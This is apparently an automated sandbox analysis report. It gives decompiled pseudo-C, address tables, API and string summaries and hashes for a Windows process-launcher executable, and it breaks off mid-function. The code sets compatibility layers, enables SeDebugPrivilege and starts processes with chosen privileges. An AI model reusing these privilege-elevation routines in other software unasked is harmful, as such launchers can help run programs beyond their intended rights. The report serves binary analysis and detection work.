					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                0x004022d5
                                                                                                                0x004022dd
                                                                                                                0x004022e7
                                                                                                                0x004022ec
                                                                                                                0x004022f7
                                                                                                                0x004022fa
                                                                                                                0x004022fd
                                                                                                                0x00402300
                                                                                                                0x00402307
                                                                                                                0x0040230d
                                                                                                                0x0040230e
                                                                                                                0x00402318
                                                                                                                0x00402321
                                                                                                                0x00402324
                                                                                                                0x00402327
                                                                                                                0x0040232a
                                                                                                                0x0040232d
                                                                                                                0x00402334
                                                                                                                0x00402337
                                                                                                                0x0040233e
                                                                                                                0x0040234f
                                                                                                                0x00402356
                                                                                                                0x0040235b
                                                                                                                0x0040235e
                                                                                                                0x0040236d
                                                                                                                0x00402374
                                                                                                                0x0040237e
                                                                                                                0x00402395
                                                                                                                0x004023a0
                                                                                                                0x004023a0
                                                                                                                0x004023ac
                                                                                                                0x004023cf
                                                                                                                0x004023d2
                                                                                                                0x004023d9
                                                                                                                0x004023de
                                                                                                                0x004023f6
                                                                                                                0x00402403
                                                                                                                0x00402414
                                                                                                                0x00402419
                                                                                                                0x00402403
                                                                                                                0x0040241a
                                                                                                                0x00402423
                                                                                                                0x00402458
                                                                                                                0x0040245d
                                                                                                                0x00402464
                                                                                                                0x00402467
                                                                                                                0x00402468
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402425
                                                                                                                0x00402428
                                                                                                                0x0040242b
                                                                                                                0x00402433
                                                                                                                0x00402434
                                                                                                                0x00402473
                                                                                                                0x00402473
                                                                                                                0x0040247c
                                                                                                                0x00402481
                                                                                                                0x00402488
                                                                                                                0x00402488
                                                                                                                0x00402495
                                                                                                                0x0040249a
                                                                                                                0x004024b7
                                                                                                                0x004024be
                                                                                                                0x004024cd
                                                                                                                0x004024d1
                                                                                                                0x004024ed
                                                                                                                0x004024f0
                                                                                                                0x00402506
                                                                                                                0x0040250b
                                                                                                                0x00402512
                                                                                                                0x00402518
                                                                                                                0x00402519
                                                                                                                0x0040251e
                                                                                                                0x00402524
                                                                                                                0x00402527
                                                                                                                0x0040252b
                                                                                                                0x00402530
                                                                                                                0x00402531
                                                                                                                0x00402531
                                                                                                                0x0040253d
                                                                                                                0x0040255a
                                                                                                                0x00402561
                                                                                                                0x00402570
                                                                                                                0x00402574
                                                                                                                0x00402590
                                                                                                                0x00402593
                                                                                                                0x004025a9
                                                                                                                0x004025ae
                                                                                                                0x004025b5
                                                                                                                0x004025bb
                                                                                                                0x004025bc
                                                                                                                0x004025c1
                                                                                                                0x004025c7
                                                                                                                0x004025ca
                                                                                                                0x004025cd
                                                                                                                0x004025ce
                                                                                                                0x004025d4
                                                                                                                0x004025d4
                                                                                                                0x004025da
                                                                                                                0x004025e3
                                                                                                                0x004025eb
                                                                                                                0x00402633
                                                                                                                0x004025fb
                                                                                                                0x00402608
                                                                                                                0x0040260f
                                                                                                                0x00402614
                                                                                                                0x00402624
                                                                                                                0x00402630
                                                                                                                0x00402630
                                                                                                                0x0040263a
                                                                                                                0x0040263b
                                                                                                                0x00402646
                                                                                                                0x0040264b
                                                                                                                0x0040264c
                                                                                                                0x0040265a
                                                                                                                0x0040265a
                                                                                                                0x0040265d
                                                                                                                0x00402666
                                                                                                                0x00402668
                                                                                                                0x00402668
                                                                                                                0x00402672
                                                                                                                0x00402675
                                                                                                                0x0040267e
                                                                                                                0x0040267e
                                                                                                                0x00402683
                                                                                                                0x0040268b
                                                                                                                0x0040269e
                                                                                                                0x0040269e
                                                                                                                0x004026a3
                                                                                                                0x004026ac
                                                                                                                0x004026b5
                                                                                                                0x004026b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004026ba
                                                                                                                0x00000000
                                                                                                                0x004026ae
                                                                                                                0x004026ae
                                                                                                                0x004026bf
                                                                                                                0x004026c1
                                                                                                                0x004026c6
                                                                                                                0x004026cc
                                                                                                                0x004026d5
                                                                                                                0x004026db
                                                                                                                0x004026e4
                                                                                                                0x004026ea
                                                                                                                0x004026f3
                                                                                                                0x004026f9
                                                                                                                0x00402707
                                                                                                                0x00402707
                                                                                                                0x0040270d
                                                                                                                0x00402710
                                                                                                                0x0040276d
                                                                                                                0x00402770
                                                                                                                0x0040280b
                                                                                                                0x0040280e
                                                                                                                0x00402813
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402819
                                                                                                                0x0040281f
                                                                                                                0x00402836
                                                                                                                0x00402841
                                                                                                                0x00402846
                                                                                                                0x0040284a
                                                                                                                0x00402851
                                                                                                                0x00402857
                                                                                                                0x00402860
                                                                                                                0x00402865
                                                                                                                0x00402876
                                                                                                                0x00402879
                                                                                                                0x00402888
                                                                                                                0x00402888
                                                                                                                0x00402857
                                                                                                                0x00402891
                                                                                                                0x0040289c
                                                                                                                0x0040289c
                                                                                                                0x00402779
                                                                                                                0x00402784
                                                                                                                0x0040278d
                                                                                                                0x004027a4
                                                                                                                0x004027b3
                                                                                                                0x004027b8
                                                                                                                0x004027bb
                                                                                                                0x004027bf
                                                                                                                0x004027c6
                                                                                                                0x004027c6
                                                                                                                0x004027d1
                                                                                                                0x004027d6
                                                                                                                0x004027d9
                                                                                                                0x004027db
                                                                                                                0x004027e2
                                                                                                                0x004027e4
                                                                                                                0x004027e4
                                                                                                                0x004027e7
                                                                                                                0x004027f4
                                                                                                                0x004027fc
                                                                                                                0x00402801
                                                                                                                0x00402801
                                                                                                                0x00402803
                                                                                                                0x00402803
                                                                                                                0x00402806
                                                                                                                0x00000000
                                                                                                                0x00402806
                                                                                                                0x00402715
                                                                                                                0x00402729
                                                                                                                0x0040272e
                                                                                                                0x00402731
                                                                                                                0x00402738
                                                                                                                0x00402738
                                                                                                                0x00402743
                                                                                                                0x00402748
                                                                                                                0x0040274d
                                                                                                                0x00402754
                                                                                                                0x00402756
                                                                                                                0x00402756
                                                                                                                0x00402759
                                                                                                                0x00402763
                                                                                                                0x00000000
                                                                                                                0x00402763
                                                                                                                0x004026fb
                                                                                                                0x00402700
                                                                                                                0x00402702
                                                                                                                0x00000000
                                                                                                                0x00402702
                                                                                                                0x004026ec
                                                                                                                0x00000000
                                                                                                                0x004026ec
                                                                                                                0x004026dd
                                                                                                                0x00000000
                                                                                                                0x004026dd
                                                                                                                0x004026ce
                                                                                                                0x00000000
                                                                                                                0x004026ce
                                                                                                                0x004026ac
                                                                                                                0x00402443
                                                                                                                0x0040246a
                                                                                                                0x00402470
                                                                                                                0x00000000
                                                                                                                0x00402470

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                                0x00408533
                                                                                                                0x00408533
                                                                                                                0x00408536
                                                                                                                0x0040853e
                                                                                                                0x00408546
                                                                                                                0x0040854d
                                                                                                                0x00408559
                                                                                                                0x00408563
                                                                                                                0x00408569
                                                                                                                0x00408572
                                                                                                                0x00408583
                                                                                                                0x0040858d
                                                                                                                0x00408595
                                                                                                                0x0040859e
                                                                                                                0x004085a2
                                                                                                                0x004085a6
                                                                                                                0x004085aa
                                                                                                                0x004085ae
                                                                                                                0x004085b8
                                                                                                                0x004085c1
                                                                                                                0x004085c8
                                                                                                                0x004085cd
                                                                                                                0x004085cf
                                                                                                                0x0040867f
                                                                                                                0x00408688
                                                                                                                0x0040868d
                                                                                                                0x0040868f
                                                                                                                0x00408730
                                                                                                                0x00408735
                                                                                                                0x00408737
                                                                                                                0x0040873d
                                                                                                                0x00408750
                                                                                                                0x0040875d
                                                                                                                0x00408763
                                                                                                                0x00408770
                                                                                                                0x00408775
                                                                                                                0x00408779
                                                                                                                0x0040878b
                                                                                                                0x00408790
                                                                                                                0x004087a2
                                                                                                                0x004087aa
                                                                                                                0x004087b8
                                                                                                                0x004087be
                                                                                                                0x004087c3
                                                                                                                0x004087c9
                                                                                                                0x004087d2
                                                                                                                0x004087df
                                                                                                                0x004087e3
                                                                                                                0x004087e6
                                                                                                                0x00408801
                                                                                                                0x004087e8
                                                                                                                0x004087f8
                                                                                                                0x004087fe
                                                                                                                0x00408811
                                                                                                                0x00408816
                                                                                                                0x00408816
                                                                                                                0x0040881c
                                                                                                                0x00408822
                                                                                                                0x00408779
                                                                                                                0x00408824
                                                                                                                0x00408829
                                                                                                                0x00408833
                                                                                                                0x00408834
                                                                                                                0x00408840
                                                                                                                0x00408848
                                                                                                                0x0040884c
                                                                                                                0x00408850
                                                                                                                0x00408855
                                                                                                                0x0040885a
                                                                                                                0x00408860
                                                                                                                0x004088ac
                                                                                                                0x004088b1
                                                                                                                0x004088b3
                                                                                                                0x004088bf
                                                                                                                0x004088c5
                                                                                                                0x004088cb
                                                                                                                0x004088da
                                                                                                                0x004088ea
                                                                                                                0x004088ed
                                                                                                                0x004088f8
                                                                                                                0x004088ff
                                                                                                                0x00408905
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x00000000
                                                                                                                0x00408862
                                                                                                                0x00408862
                                                                                                                0x0040886d
                                                                                                                0x00408874
                                                                                                                0x0040887b
                                                                                                                0x00408882
                                                                                                                0x00408889
                                                                                                                0x00408895
                                                                                                                0x00408897
                                                                                                                0x00408658
                                                                                                                0x00408658
                                                                                                                0x0040865d
                                                                                                                0x00408661
                                                                                                                0x0040866a
                                                                                                                0x00408673
                                                                                                                0x00408678
                                                                                                                0x00000000
                                                                                                                0x00408678
                                                                                                                0x00408860
                                                                                                                0x00408695
                                                                                                                0x00408695
                                                                                                                0x0040869f
                                                                                                                0x004086a2
                                                                                                                0x004086af
                                                                                                                0x004086a4
                                                                                                                0x004086a7
                                                                                                                0x004086a7
                                                                                                                0x004086b4
                                                                                                                0x004086bf
                                                                                                                0x004086cb
                                                                                                                0x004086d3
                                                                                                                0x004086d7
                                                                                                                0x004086db
                                                                                                                0x004086e0
                                                                                                                0x004086f1
                                                                                                                0x004086f8
                                                                                                                0x004086ff
                                                                                                                0x00408706
                                                                                                                0x0040870d
                                                                                                                0x00408719
                                                                                                                0x0040871b
                                                                                                                0x00000000
                                                                                                                0x0040871b
                                                                                                                0x004085d5
                                                                                                                0x004085da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004085ec
                                                                                                                0x004085ef
                                                                                                                0x004085f6
                                                                                                                0x004085fd
                                                                                                                0x00408604
                                                                                                                0x0040860b
                                                                                                                0x00408612
                                                                                                                0x00408616
                                                                                                                0x00408620
                                                                                                                0x0040862a
                                                                                                                0x00408632
                                                                                                                0x00408633
                                                                                                                0x00408638
                                                                                                                0x0040864f
                                                                                                                0x00408651
                                                                                                                0x00000000
                                                                                                                0x0040854f
                                                                                                                0x0040854f
                                                                                                                0x00408550
                                                                                                                0x00408556
                                                                                                                0x00408556

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
